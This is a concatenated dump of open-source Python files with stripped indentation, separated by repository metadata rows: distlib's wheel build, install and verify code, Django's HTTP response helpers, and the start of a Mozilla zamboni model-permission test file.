IMP_PREFIX = 'cp'
VER_SUFFIX = sysconfig.get_config_var('py_version_nodot')
if not VER_SUFFIX: # pragma: no cover
VER_SUFFIX = '%s%s' % sys.version_info[:2]
PYVER = 'py' + VER_SUFFIX
IMPVER = IMP_PREFIX + VER_SUFFIX
ARCH = distutils.util.get_platform().replace('-', '_').replace('.', '_')
ABI = sysconfig.get_config_var('SOABI')
if ABI and ABI.startswith('cpython-'):
ABI = ABI.replace('cpython-', 'cp')
else:
def _derive_abi():
parts = ['cp', VER_SUFFIX]
if sysconfig.get_config_var('Py_DEBUG'):
parts.append('d')
if sysconfig.get_config_var('WITH_PYMALLOC'):
parts.append('m')
if sysconfig.get_config_var('Py_UNICODE_SIZE') == 4:
parts.append('u')
return ''.join(parts)
ABI = _derive_abi()
del _derive_abi
FILENAME_RE = re.compile(r'''
(?P<nm>[^-]+)
-(?P<vn>\d+[^-]*)
(-(?P<bn>\d+[^-]*))?
-(?P<py>\w+\d+(\.\w+\d+)*)
-(?P<bi>\w+)
-(?P<ar>\w+(\.\w+)*)
\.whl$
''', re.IGNORECASE | re.VERBOSE)
NAME_VERSION_RE = re.compile(r'''
(?P<nm>[^-]+)
-(?P<vn>\d+[^-]*)
(-(?P<bn>\d+[^-]*))?$
''', re.IGNORECASE | re.VERBOSE)
SHEBANG_RE = re.compile(br'\s*#![^\r\n]*')
SHEBANG_DETAIL_RE = re.compile(br'^(\s*#!("[^"]+"|\S+))\s+(.*)$')
SHEBANG_PYTHON = b'#!python'
SHEBANG_PYTHONW = b'#!pythonw'
if os.sep == '/':
to_posix = lambda o: o
else:
to_posix = lambda o: o.replace(os.sep, '/')
class Mounter(object):
def __init__(self):
self.impure_wheels = {}
self.libs = {}
def add(self, pathname, extensions):
self.impure_wheels[pathname] = extensions
self.libs.update(extensions)
def remove(self, pathname):
extensions = self.impure_wheels.pop(pathname)
for k, v in extensions:
if k in self.libs:
del self.libs[k]
def find_module(self, fullname, path=None):
if fullname in self.libs:
result = self
else:
result = None
return result
def load_module(self, fullname):
if fullname in sys.modules:
result = sys.modules[fullname]
else:
if fullname not in self.libs:
raise ImportError('unable to find extension for %s' % fullname)
result = imp.load_dynamic(fullname, self.libs[fullname])
result.__loader__ = self
parts = fullname.rsplit('.', 1)
if len(parts) > 1:
result.__package__ = parts[0]
return result
_hook = Mounter()
class Wheel(object):
"""
Class to build and install from Wheel files (PEP 427).
"""
wheel_version = (1, 1)
hash_kind = 'sha256'
def __init__(self, filename=None, sign=False, verify=False):
"""
Initialise an instance using a (valid) filename.
"""
self.sign = sign
self.should_verify = verify
self.buildver = ''
self.pyver = [PYVER]
self.abi = ['none']
self.arch = ['any']
self.dirname = os.getcwd()
if filename is None:
self.name = 'dummy'
self.version = '0.1'
self._filename = self.filename
else:
m = NAME_VERSION_RE.match(filename)
if m:
info = m.groupdict('')
self.name = info['nm']
# Reinstate the local version separator
self.version = info['vn'].replace('_', '-')
self.buildver = info['bn']
self._filename = self.filename
else:
dirname, filename = os.path.split(filename)
m = FILENAME_RE.match(filename)
if not m:
raise DistlibException('Invalid name or '
'filename: %r' % filename)
if dirname:
self.dirname = os.path.abspath(dirname)
self._filename = filename
info = m.groupdict('')
self.name = info['nm']
self.version = info['vn']
self.buildver = info['bn']
self.pyver = info['py'].split('.')
self.abi = info['bi'].split('.')
self.arch = info['ar'].split('.')
@property
def filename(self):
"""
Build and return a filename from the various components.
"""
if self.buildver:
buildver = '-' + self.buildver
else:
buildver = ''
pyver = '.'.join(self.pyver)
abi = '.'.join(self.abi)
arch = '.'.join(self.arch)
# replace - with _ as a local version separator
version = self.version.replace('-', '_')
return '%s-%s%s-%s-%s-%s.whl' % (self.name, version, buildver,
pyver, abi, arch)
@property
def exists(self):
path = os.path.join(self.dirname, self.filename)
return os.path.isfile(path)
@property
def tags(self):
for pyver in self.pyver:
for abi in self.abi:
for arch in self.arch:
yield pyver, abi, arch
@cached_property
def metadata(self):
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
wrapper = codecs.getreader('utf-8')
with ZipFile(pathname, 'r') as zf:
wheel_metadata = self.get_wheel_metadata(zf)
wv = wheel_metadata['Wheel-Version'].split('.', 1)
file_version = tuple([int(i) for i in wv])
if file_version < (1, 1):
fn = 'METADATA'
else:
fn = METADATA_FILENAME
try:
metadata_filename = posixpath.join(info_dir, fn)
with zf.open(metadata_filename) as bf:
wf = wrapper(bf)
result = Metadata(fileobj=wf)
except KeyError:
raise ValueError('Invalid wheel, because %s is '
'missing' % fn)
return result
def get_wheel_metadata(self, zf):
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
metadata_filename = posixpath.join(info_dir, 'WHEEL')
with zf.open(metadata_filename) as bf:
wf = codecs.getreader('utf-8')(bf)
message = message_from_file(wf)
return dict(message)
@cached_property
def info(self):
pathname = os.path.join(self.dirname, self.filename)
with ZipFile(pathname, 'r') as zf:
result = self.get_wheel_metadata(zf)
return result
def process_shebang(self, data):
m = SHEBANG_RE.match(data)
if m:
end = m.end()
shebang, data_after_shebang = data[:end], data[end:]
# Preserve any arguments after the interpreter
if b'pythonw' in shebang.lower():
shebang_python = SHEBANG_PYTHONW
else:
shebang_python = SHEBANG_PYTHON
m = SHEBANG_DETAIL_RE.match(shebang)
if m:
args = b' ' + m.groups()[-1]
else:
args = b''
shebang = shebang_python + args
data = shebang + data_after_shebang
else:
cr = data.find(b'\r')
lf = data.find(b'\n')
if cr < 0 or cr > lf:
term = b'\n'
else:
if data[cr:cr + 2] == b'\r\n':
term = b'\r\n'
else:
term = b'\r'
data = SHEBANG_PYTHON + term + data
return data
def get_hash(self, data, hash_kind=None):
if hash_kind is None:
hash_kind = self.hash_kind
try:
hasher = getattr(hashlib, hash_kind)
except AttributeError:
raise DistlibException('Unsupported hash algorithm: %r' % hash_kind)
result = hasher(data).digest()
result = base64.urlsafe_b64encode(result).rstrip(b'=').decode('ascii')
return hash_kind, result
def write_record(self, records, record_path, base):
records = list(records) # make a copy for sorting
p = to_posix(os.path.relpath(record_path, base))
records.append((p, '', ''))
records.sort()
with CSVWriter(record_path) as writer:
for row in records:
writer.writerow(row)
def write_records(self, info, libdir, archive_paths):
records = []
distinfo, info_dir = info
hasher = getattr(hashlib, self.hash_kind)
for ap, p in archive_paths:
with open(p, 'rb') as f:
data = f.read()
digest = '%s=%s' % self.get_hash(data)
size = os.path.getsize(p)
records.append((ap, digest, size))
p = os.path.join(distinfo, 'RECORD')
self.write_record(records, p, libdir)
ap = to_posix(os.path.join(info_dir, 'RECORD'))
archive_paths.append((ap, p))
def build_zip(self, pathname, archive_paths):
with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
for ap, p in archive_paths:
logger.debug('Wrote %s to %s in wheel', p, ap)
zf.write(p, ap)
def build(self, paths, tags=None, wheel_version=None):
"""
Build a wheel from files in specified paths, and use any specified tags
when determining the name of the wheel.
"""
if tags is None:
tags = {}
libkey = list(filter(lambda o: o in paths, ('purelib', 'platlib')))[0]
if libkey == 'platlib':
is_pure = 'false'
default_pyver = [IMPVER]
default_abi = [ABI]
default_arch = [ARCH]
else:
is_pure = 'true'
default_pyver = [PYVER]
default_abi = ['none']
default_arch = ['any']
self.pyver = tags.get('pyver', default_pyver)
self.abi = tags.get('abi', default_abi)
self.arch = tags.get('arch', default_arch)
libdir = paths[libkey]
name_ver = '%s-%s' % (self.name, self.version)
data_dir = '%s.data' % name_ver
info_dir = '%s.dist-info' % name_ver
archive_paths = []
# First, stuff which is not in site-packages
for key in ('data', 'headers', 'scripts'):
if key not in paths:
continue
path = paths[key]
if os.path.isdir(path):
for root, dirs, files in os.walk(path):
for fn in files:
p = fsdecode(os.path.join(root, fn))
rp = os.path.relpath(p, path)
ap = to_posix(os.path.join(data_dir, key, rp))
archive_paths.append((ap, p))
if key == 'scripts' and not p.endswith('.exe'):
with open(p, 'rb') as f:
data = f.read()
data = self.process_shebang(data)
with open(p, 'wb') as f:
f.write(data)
# Now, stuff which is in site-packages, other than the
# distinfo stuff.
path = libdir
distinfo = None
for root, dirs, files in os.walk(path):
if root == path:
# At the top level only, save distinfo for later
# and skip it for now
for i, dn in enumerate(dirs):
dn = fsdecode(dn)
if dn.endswith('.dist-info'):
distinfo = os.path.join(root, dn)
del dirs[i]
break
assert distinfo, '.dist-info directory expected, not found'
for fn in files:
# comment out next suite to leave .pyc files in
if fsdecode(fn).endswith(('.pyc', '.pyo')):
continue
p = os.path.join(root, fn)
rp = to_posix(os.path.relpath(p, path))
archive_paths.append((rp, p))
# Now distinfo. Assumed to be flat, i.e. os.listdir is enough.
files = os.listdir(distinfo)
for fn in files:
if fn not in ('RECORD', 'INSTALLER', 'SHARED', 'WHEEL'):
p = fsdecode(os.path.join(distinfo, fn))
ap = to_posix(os.path.join(info_dir, fn))
archive_paths.append((ap, p))
wheel_metadata = [
'Wheel-Version: %d.%d' % (wheel_version or self.wheel_version),
'Generator: distlib %s' % __version__,
'Root-Is-Purelib: %s' % is_pure,
]
for pyver, abi, arch in self.tags:
wheel_metadata.append('Tag: %s-%s-%s' % (pyver, abi, arch))
p = os.path.join(distinfo, 'WHEEL')
with open(p, 'w') as f:
f.write('\n'.join(wheel_metadata))
ap = to_posix(os.path.join(info_dir, 'WHEEL'))
archive_paths.append((ap, p))
# Now, at last, RECORD.
# Paths in here are archive paths - nothing else makes sense.
self.write_records((distinfo, info_dir), libdir, archive_paths)
# Now, ready to build the zip file
pathname = os.path.join(self.dirname, self.filename)
self.build_zip(pathname, archive_paths)
return pathname
def install(self, paths, maker, **kwargs):
"""
Install a wheel to the specified paths. If kwarg ``warner`` is
specified, it should be a callable, which will be called with two
tuples indicating the wheel version of this software and the wheel
version in the file, if there is a discrepancy in the versions.
This can be used to issue any warnings to raise any exceptions.
If kwarg ``lib_only`` is True, only the purelib/platlib files are
installed, and the headers, scripts, data and dist-info metadata are
not written.
The return value is a :class:`InstalledDistribution` instance unless
``options.lib_only`` is True, in which case the return value is ``None``.
"""
dry_run = maker.dry_run
warner = kwargs.get('warner')
lib_only = kwargs.get('lib_only', False)
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
data_dir = '%s.data' % name_ver
info_dir = '%s.dist-info' % name_ver
metadata_name = posixpath.join(info_dir, METADATA_FILENAME)
wheel_metadata_name = posixpath.join(info_dir, 'WHEEL')
record_name = posixpath.join(info_dir, 'RECORD')
wrapper = codecs.getreader('utf-8')
with ZipFile(pathname, 'r') as zf:
with zf.open(wheel_metadata_name) as bwf:
wf = wrapper(bwf)
message = message_from_file(wf)
wv = message['Wheel-Version'].split('.', 1)
file_version = tuple([int(i) for i in wv])
if (file_version != self.wheel_version) and warner:
warner(self.wheel_version, file_version)
if message['Root-Is-Purelib'] == 'true':
libdir = paths['purelib']
else:
libdir = paths['platlib']
records = {}
with zf.open(record_name) as bf:
with CSVReader(stream=bf) as reader:
for row in reader:
p = row[0]
records[p] = row
data_pfx = posixpath.join(data_dir, '')
info_pfx = posixpath.join(info_dir, '')
script_pfx = posixpath.join(data_dir, 'scripts', '')
# make a new instance rather than a copy of maker's,
# as we mutate it
fileop = FileOperator(dry_run=dry_run)
fileop.record = True # so we can rollback if needed
bc = not sys.dont_write_bytecode # Double negatives. Lovely!
outfiles = [] # for RECORD writing
# for script copying/shebang processing
workdir = tempfile.mkdtemp()
# set target dir later
# we default add_launchers to False, as the
# Python Launcher should be used instead
maker.source_dir = workdir
maker.target_dir = None
try:
for zinfo in zf.infolist():
arcname = zinfo.filename
if isinstance(arcname, text_type):
u_arcname = arcname
else:
u_arcname = arcname.decode('utf-8')
# The signature file won't be in RECORD,
# and we don't currently don't do anything with it
if u_arcname.endswith('/RECORD.jws'):
continue
row = records[u_arcname]
if row[2] and str(zinfo.file_size) != row[2]:
raise DistlibException('size mismatch for '
'%s' % u_arcname)
if row[1]:
kind, value = row[1].split('=', 1)
with zf.open(arcname) as bf:
data = bf.read()
_, digest = self.get_hash(data, kind)
if digest != value:
raise DistlibException('digest mismatch for '
'%s' % arcname)
if lib_only and u_arcname.startswith((info_pfx, data_pfx)):
logger.debug('lib_only: skipping %s', u_arcname)
continue
is_script = (u_arcname.startswith(script_pfx)
and not u_arcname.endswith('.exe'))
if u_arcname.startswith(data_pfx):
_, where, rp = u_arcname.split('/', 2)
outfile = os.path.join(paths[where], convert_path(rp))
else:
# meant for site-packages.
if u_arcname in (wheel_metadata_name, record_name):
continue
outfile = os.path.join(libdir, convert_path(u_arcname))
if not is_script:
with zf.open(arcname) as bf:
fileop.copy_stream(bf, outfile)
outfiles.append(outfile)
# Double check the digest of the written file
if not dry_run and row[1]:
with open(outfile, 'rb') as bf:
data = bf.read()
_, newdigest = self.get_hash(data, kind)
if newdigest != digest:
raise DistlibException('digest mismatch '
'on write for '
'%s' % outfile)
if bc and outfile.endswith('.py'):
try:
pyc = fileop.byte_compile(outfile)
outfiles.append(pyc)
except Exception:
# Don't give up if byte-compilation fails,
# but log it and perhaps warn the user
logger.warning('Byte-compilation failed',
exc_info=True)
else:
fn = os.path.basename(convert_path(arcname))
workname = os.path.join(workdir, fn)
with zf.open(arcname) as bf:
fileop.copy_stream(bf, workname)
dn, fn = os.path.split(outfile)
maker.target_dir = dn
filenames = maker.make(fn)
fileop.set_executable_mode(filenames)
outfiles.extend(filenames)
if lib_only:
logger.debug('lib_only: returning None')
dist = None
else:
# Generate scripts
# Try to get pydist.json so we can see if there are
# any commands to generate. If this fails (e.g. because
# of a legacy wheel), log a warning but don't give up.
commands = None
file_version = self.info['Wheel-Version']
if file_version == '1.0':
# Use legacy info
ep = posixpath.join(info_dir, 'entry_points.txt')
try:
with zf.open(ep) as bwf:
epdata = read_exports(bwf)
commands = {}
for key in ('console', 'gui'):
k = '%s_scripts' % key
if k in epdata:
commands['wrap_%s' % key] = d = {}
for v in epdata[k].values():
s = '%s:%s' % (v.prefix, v.suffix)
if v.flags:
s += ' %s' % v.flags
d[v.name] = s
except Exception:
logger.warning('Unable to read legacy script '
'metadata, so cannot generate '
'scripts')
else:
try:
with zf.open(metadata_name) as bwf:
wf = wrapper(bwf)
commands = json.load(wf).get('extensions')
if commands:
commands = commands.get('python.commands')
except Exception:
logger.warning('Unable to read JSON metadata, so '
'cannot generate scripts')
if commands:
console_scripts = commands.get('wrap_console', {})
gui_scripts = commands.get('wrap_gui', {})
if console_scripts or gui_scripts:
script_dir = paths.get('scripts', '')
if not os.path.isdir(script_dir):
raise ValueError('Valid script path not '
'specified')
maker.target_dir = script_dir
for k, v in console_scripts.items():
script = '%s = %s' % (k, v)
filenames = maker.make(script)
fileop.set_executable_mode(filenames)
if gui_scripts:
options = {'gui': True }
for k, v in gui_scripts.items():
script = '%s = %s' % (k, v)
filenames = maker.make(script, options)
fileop.set_executable_mode(filenames)
p = os.path.join(libdir, info_dir)
dist = InstalledDistribution(p)
# Write SHARED
paths = dict(paths) # don't change passed in dict
del paths['purelib']
del paths['platlib']
paths['lib'] = libdir
p = dist.write_shared_locations(paths, dry_run)
if p:
outfiles.append(p)
# Write RECORD
dist.write_installed_files(outfiles, paths['prefix'],
dry_run)
return dist
except Exception: # pragma: no cover
logger.exception('installation failed.')
fileop.rollback()
raise
finally:
shutil.rmtree(workdir)
def _get_dylib_cache(self):
global cache
if cache is None:
# Use native string to avoid issues on 2.x: see Python #20140.
base = os.path.join(get_cache_base(), str('dylib-cache'),
sys.version[:3])
cache = Cache(base)
return cache
def _get_extensions(self):
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
arcname = posixpath.join(info_dir, 'EXTENSIONS')
wrapper = codecs.getreader('utf-8')
result = []
with ZipFile(pathname, 'r') as zf:
try:
with zf.open(arcname) as bf:
wf = wrapper(bf)
extensions = json.load(wf)
cache = self._get_dylib_cache()
prefix = cache.prefix_to_dir(pathname)
cache_base = os.path.join(cache.base, prefix)
if not os.path.isdir(cache_base):
os.makedirs(cache_base)
for name, relpath in extensions.items():
dest = os.path.join(cache_base, convert_path(relpath))
if not os.path.exists(dest):
extract = True
else:
file_time = os.stat(dest).st_mtime
file_time = datetime.datetime.fromtimestamp(file_time)
info = zf.getinfo(relpath)
wheel_time = datetime.datetime(*info.date_time)
extract = wheel_time > file_time
if extract:
zf.extract(relpath, cache_base)
result.append((name, dest))
except KeyError:
pass
return result
def is_compatible(self):
"""
Determine if a wheel is compatible with the running system.
"""
return is_compatible(self)
def is_mountable(self):
"""
Determine if a wheel is asserted as mountable by its metadata.
"""
return True # for now - metadata details TBD
def mount(self, append=False):
pathname = os.path.abspath(os.path.join(self.dirname, self.filename))
if not self.is_compatible():
msg = 'Wheel %s not compatible with this Python.' % pathname
raise DistlibException(msg)
if not self.is_mountable():
msg = 'Wheel %s is marked as not mountable.' % pathname
raise DistlibException(msg)
if pathname in sys.path:
logger.debug('%s already in path', pathname)
else:
if append:
sys.path.append(pathname)
else:
sys.path.insert(0, pathname)
extensions = self._get_extensions()
if extensions:
if _hook not in sys.meta_path:
sys.meta_path.append(_hook)
_hook.add(pathname, extensions)
def unmount(self):
pathname = os.path.abspath(os.path.join(self.dirname, self.filename))
if pathname not in sys.path:
logger.debug('%s not in path', pathname)
else:
sys.path.remove(pathname)
if pathname in _hook.impure_wheels:
_hook.remove(pathname)
if not _hook.impure_wheels:
if _hook in sys.meta_path:
sys.meta_path.remove(_hook)
def verify(self):
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
data_dir = '%s.data' % name_ver
info_dir = '%s.dist-info' % name_ver
metadata_name = posixpath.join(info_dir, METADATA_FILENAME)
wheel_metadata_name = posixpath.join(info_dir, 'WHEEL')
record_name = posixpath.join(info_dir, 'RECORD')
wrapper = codecs.getreader('utf-8')
with ZipFile(pathname, 'r') as zf:
with zf.open(wheel_metadata_name) as bwf:
wf = wrapper(bwf)
message = message_from_file(wf)
wv = message['Wheel-Version'].split('.', 1)
file_version = tuple([int(i) for i in wv])
# TODO version verification
records = {}
with zf.open(record_name) as bf:
with CSVReader(stream=bf) as reader:
for row in reader:
p = row[0]
records[p] = row
for zinfo in zf.infolist():
arcname = zinfo.filename
if isinstance(arcname, text_type):
u_arcname = arcname
else:
u_arcname = arcname.decode('utf-8')
if '..' in u_arcname:
raise DistlibException('invalid entry in '
'wheel: %r' % u_arcname)
# The signature file won't be in RECORD,
# and we don't currently don't do anything with it
if u_arcname.endswith('/RECORD.jws'):
continue
row = records[u_arcname]
if row[2] and str(zinfo.file_size) != row[2]:
raise DistlibException('size mismatch for '
'%s' % u_arcname)
if row[1]:
kind, value = row[1].split('=', 1)
with zf.open(arcname) as bf:
data = bf.read()
_, digest = self.get_hash(data, kind)
if digest != value:
raise DistlibException('digest mismatch for '
'%s' % arcname)
def update(self, modifier, dest_dir=None, **kwargs):
"""
Update the contents of a wheel in a generic way. The modifier should
be a callable which expects a dictionary argument: its keys are
archive-entry paths, and its values are absolute filesystem paths
where the contents the corresponding archive entries can be found. The
modifier is free to change the contents of the files pointed to, add
new entries and remove entries, before returning. This method will
extract the entire contents of the wheel to a temporary location, call
the modifier, and then use the passed (and possibly updated)
dictionary to write a new wheel. If ``dest_dir`` is specified, the new
wheel is written there -- otherwise, the original wheel is overwritten.
The modifier should return True if it updated the wheel, else False.
This method returns the same value the modifier returns.
"""
def get_version(path_map, info_dir):
version = path = None
key = '%s/%s' % (info_dir, METADATA_FILENAME)
if key not in path_map:
key = '%s/PKG-INFO' % info_dir
if key in path_map:
path = path_map[key]
version = Metadata(path=path).version
return version, path
def update_version(version, path):
updated = None
try:
v = NormalizedVersion(version)
i = version.find('-')
if i < 0:
updated = '%s+1' % version
else:
parts = [int(s) for s in version[i + 1:].split('.')]
parts[-1] += 1
updated = '%s+%s' % (version[:i],
'.'.join(str(i) for i in parts))
except UnsupportedVersionError:
logger.debug('Cannot update non-compliant (PEP-440) '
'version %r', version)
if updated:
md = Metadata(path=path)
md.version = updated
legacy = not path.endswith(METADATA_FILENAME)
md.write(path=path, legacy=legacy)
logger.debug('Version updated from %r to %r', version,
updated)
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
record_name = posixpath.join(info_dir, 'RECORD')
with tempdir() as workdir:
with ZipFile(pathname, 'r') as zf:
path_map = {}
for zinfo in zf.infolist():
arcname = zinfo.filename
if isinstance(arcname, text_type):
u_arcname = arcname
else:
u_arcname = arcname.decode('utf-8')
if u_arcname == record_name:
continue
if '..' in u_arcname:
raise DistlibException('invalid entry in '
'wheel: %r' % u_arcname)
zf.extract(zinfo, workdir)
path = os.path.join(workdir, convert_path(u_arcname))
path_map[u_arcname] = path
# Remember the version.
original_version, _ = get_version(path_map, info_dir)
# Files extracted. Call the modifier.
modified = modifier(path_map, **kwargs)
if modified:
# Something changed - need to build a new wheel.
current_version, path = get_version(path_map, info_dir)
if current_version and (current_version == original_version):
# Add or update local version to signify changes.
update_version(current_version, path)
# Decide where the new wheel goes.
if dest_dir is None:
fd, newpath = tempfile.mkstemp(suffix='.whl',
prefix='wheel-update-',
dir=workdir)
os.close(fd)
else:
if not os.path.isdir(dest_dir):
raise DistlibException('Not a directory: %r' % dest_dir)
newpath = os.path.join(dest_dir, self.filename)
archive_paths = list(path_map.items())
distinfo = os.path.join(workdir, info_dir)
info = distinfo, info_dir
self.write_records(info, workdir, archive_paths)
self.build_zip(newpath, archive_paths)
if dest_dir is None:
shutil.copyfile(newpath, pathname)
return modified
def compatible_tags():
"""
Return (pyver, abi, arch) tuples compatible with this Python.
"""
versions = [VER_SUFFIX]
major = VER_SUFFIX[0]
for minor in range(sys.version_info[1] - 1, - 1, -1):
versions.append(''.join([major, str(minor)]))
abis = []
for suffix, _, _ in imp.get_suffixes():
if suffix.startswith('.abi'):
abis.append(suffix.split('.', 2)[1])
abis.sort()
if ABI != 'none':
abis.insert(0, ABI)
abis.append('none')
result = []
arches = [ARCH]
if sys.platform == 'darwin':
m = re.match('(\w+)_(\d+)_(\d+)_(\w+)$', ARCH)
if m:
name, major, minor, arch = m.groups()
minor = int(minor)
matches = [arch]
if arch in ('i386', 'ppc'):
matches.append('fat')
if arch in ('i386', 'ppc', 'x86_64'):
matches.append('fat3')
if arch in ('ppc64', 'x86_64'):
matches.append('fat64')
if arch in ('i386', 'x86_64'):
matches.append('intel')
if arch in ('i386', 'x86_64', 'intel', 'ppc', 'ppc64'):
matches.append('universal')
while minor >= 0:
for match in matches:
s = '%s_%s_%s_%s' % (name, major, minor, match)
if s != ARCH: # already there
arches.append(s)
minor -= 1
# Most specific - our Python version, ABI and arch
for abi in abis:
for arch in arches:
result.append((''.join((IMP_PREFIX, versions[0])), abi, arch))
# where no ABI / arch dependency, but IMP_PREFIX dependency
for i, version in enumerate(versions):
result.append((''.join((IMP_PREFIX, version)), 'none', 'any'))
if i == 0:
result.append((''.join((IMP_PREFIX, version[0])), 'none', 'any'))
# no IMP_PREFIX, ABI or arch dependency
for i, version in enumerate(versions):
result.append((''.join(('py', version)), 'none', 'any'))
if i == 0:
result.append((''.join(('py', version[0])), 'none', 'any'))
return set(result)
COMPATIBLE_TAGS = compatible_tags()
del compatible_tags
def is_compatible(wheel, tags=None):
if not isinstance(wheel, Wheel):
wheel = Wheel(wheel) # assume it's a filename
result = False
if tags is None:
tags = COMPATIBLE_TAGS
for ver, abi, arch in tags:
if ver in wheel.pyver and abi in wheel.abi and arch in wheel.arch:
result = True
break
return result
| mit |
joebowen/movement_validation_cloud | djangodev/lib/python2.7/site-packages/django/http/utils.py | 134 | 1501 | """
Functions that modify an HTTP request or response in some way.
"""
# This group of functions are run as part of the response handling, after
# everything else, including all response middleware. Think of them as
# "compulsory response middleware". Be careful about what goes here, because
# it's a little fiddly to override this behavior, so they should be truly
# universally applicable.
def fix_location_header(request, response):
"""
Ensures that we always use an absolute URI in any location header in the
response. This is required by RFC 2616, section 14.30.
Code constructing response objects is free to insert relative paths, as
this function converts them to absolute paths.
"""
if 'Location' in response and request.get_host():
response['Location'] = request.build_absolute_uri(response['Location'])
return response
def conditional_content_removal(request, response):
"""
Removes the content of responses for HEAD requests, 1xx, 204 and 304
responses. Ensures compliance with RFC 2616, section 4.3.
"""
if 100 <= response.status_code < 200 or response.status_code in (204, 304):
if response.streaming:
response.streaming_content = []
else:
response.content = b''
response['Content-Length'] = '0'
if request.method == 'HEAD':
if response.streaming:
response.streaming_content = []
else:
response.content = b''
return response
| mit |
mozilla/zamboni | mkt/comm/tests/test_models.py | 6 | 14567 | from datetime import datetime
from os import path
from django.core.exceptions import ValidationError
from django.core.urlresolvers import NoReverseMatch
from django.test.utils import override_settings
import mock
from nose.tools import eq_, ok_
import mkt
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread, CommunicationThreadCC,
CommunicationThreadToken, user_has_perm_app,
user_has_perm_note, user_has_perm_thread)
from mkt.comm.tests.test_views import CommTestMixin
from mkt.constants import comm as const
from mkt.site.fixtures import fixture
from mkt.site.tests import (TestCase, app_factory, extension_factory,
user_factory)
from mkt.webapps.models import Webapp
from mkt.users.models import UserProfile
TESTS_DIR = path.dirname(path.abspath(__file__))
ATTACHMENTS_DIR = path.join(TESTS_DIR, 'attachments')
class PermissionTestMixin(object):
fixtures = fixture('user_999', 'webapp_337141')
def setUp(self):
self.addon = Webapp.objects.get()
self.version = self.addon.current_version
self.user = UserProfile.objects.get(email='regular@mozilla.com')
self.thread = CommunicationThread.objects.create(
_addon=self.addon, _version=self.version)
self.author = user_factory(email='lol')
self.note = CommunicationNote.objects.create(
thread=self.thread, author=self.author, note_type=0, body='xyz')
self.obj = None
def _eq_obj_perm(self, val):
if self.type == 'note':
eq_(user_has_perm_note(self.obj, self.user), val)
else:
eq_(user_has_perm_thread(self.obj, self.user), val)
def test_no_perm(self):
self._eq_obj_perm(False)
def test_has_perm_public(self):
self.obj.update(read_permission_public=True)
self._eq_obj_perm(True)
def test_has_perm_dev(self):
self.obj.update(read_permission_developer=True)
self.addon.addonuser_set.create(user=self.user)
self._eq_obj_perm(True)
def test_has_perm_rev_addons(self):
self.obj.update(read_permission_reviewer=True)
self.grant_permission(self.user, 'Apps:Review')
self._eq_obj_perm(True)
def test_has_perm_rev_ext(self):
self.obj.update(read_permission_reviewer=True)
self.grant_permission(self.user, 'ContentTools:AddonReview')
self._eq_obj_perm(True)
def test_has_perm_senior_rev(self):
self.obj.update(read_permission_senior_reviewer=True)
self.grant_permission(self.user, 'Apps:ReviewEscalated')
self._eq_obj_perm(True)
def test_has_perm_moz_contact(self):
self.obj.update(read_permission_mozilla_contact=True)
self.addon.update(
mozilla_contact=','.join([self.user.email, 'lol@lol.com']))
self._eq_obj_perm(True)
def test_has_perm_staff(self):
self.obj.update(read_permission_staff=True)
self.grant_permission(self.user, 'Admin:*')
self._eq_obj_perm(True)
class TestCommunicationNote(PermissionTestMixin, TestCase):
def setUp(self):
super(TestCommunicationNote, self).setUp()
self.type = 'note'
self.obj = self.note
def test_has_perm_author(self):
self.obj.update(author=self.user)
self._eq_obj_perm(True)
def test_has_perm_no_author(self):
self.obj.update(author=None)
self._eq_obj_perm(False)
def test_manager(self):
eq_(CommunicationNote.objects.count(), 1)
eq_(CommunicationNote.objects.with_perms(self.user,
self.thread).count(), 0)
self.note.update(author=self.user)
eq_(CommunicationNote.objects.with_perms(self.user,
self.thread).count(), 1)
class TestCommunicationThread(PermissionTestMixin, TestCase):
def setUp(self):
super(TestCommunicationThread, self).setUp()
self.type = 'thread'
self.obj = self.thread
def test_addon_deleted(self):
self.thread.obj.update(status=mkt.STATUS_DELETED)
eq_(self.thread.obj, self.addon)
def test_version_deleted(self):
self.version.update(deleted=True)
eq_(self.thread.version, self.version)
def test_has_perm_posted(self):
self.note.update(author=self.user)
self._eq_obj_perm(True)
def test_has_perm_cc(self):
CommunicationThreadCC.objects.create(user=self.user, thread=self.obj)
self._eq_obj_perm(True)
def test_has_perm_app_reviewer(self):
ok_(not user_has_perm_app(self.user, self.addon))
self.grant_permission(self.user, 'Apps:Review')
ok_(user_has_perm_app(self.user, self.addon))
def test_has_perm_app_developer(self):
ok_(not user_has_perm_app(self.user, self.addon))
self.addon.addonuser_set.create(user=self.user)
ok_(user_has_perm_app(self.user, self.addon))
def test_clean(self):
with self.assertRaises(ValidationError):
# Need app.
CommunicationThread.objects.create().clean()
with self.assertRaises(ValidationError):
# Need version.
CommunicationThread.objects.create(_addon=self.addon).clean()
class TestCommunicationThreadExtension(TestCase):
fixtures = fixture('user_999',)
def setUp(self):
self.extension = extension_factory()
self.version = self.extension.latest_version
self.user = UserProfile.objects.get(email='regular@mozilla.com')
self.thread = CommunicationThread.objects.create(
_extension=self.extension, _extension_version=self.version)
self.author = user_factory(email='lol')
self.note = CommunicationNote.objects.create(
thread=self.thread, author=self.author, note_type=0, body='xyz')
def test_fields(self):
ok_(not self.thread._addon)
ok_(not self.thread._version)
def test_obj(self):
eq_(self.thread.obj, self.extension)
def test_version(self):
eq_(self.thread.version, self.version)
def test_clean(self):
with self.assertRaises(ValidationError):
# Need extension version.
CommunicationThread.objects.create(
_extension=self.extension).clean()
class TestThreadTokenModel(TestCase):
fixtures = fixture('user_999', 'webapp_337141')
def setUp(self):
addon = Webapp.objects.get(pk=337141)
self.thread = CommunicationThread(_addon=addon)
user = UserProfile.objects.all()[0]
self.token = CommunicationThreadToken(thread=self.thread, user=user)
self.token.modified = datetime.now()
self.token.use_count = 0
def test_live_thread_token_is_valid(self):
"""
Test `is_valid()` when the token is fresh (not expired).
"""
assert self.token.is_valid()
def test_expired_thread_token_is_valid(self):
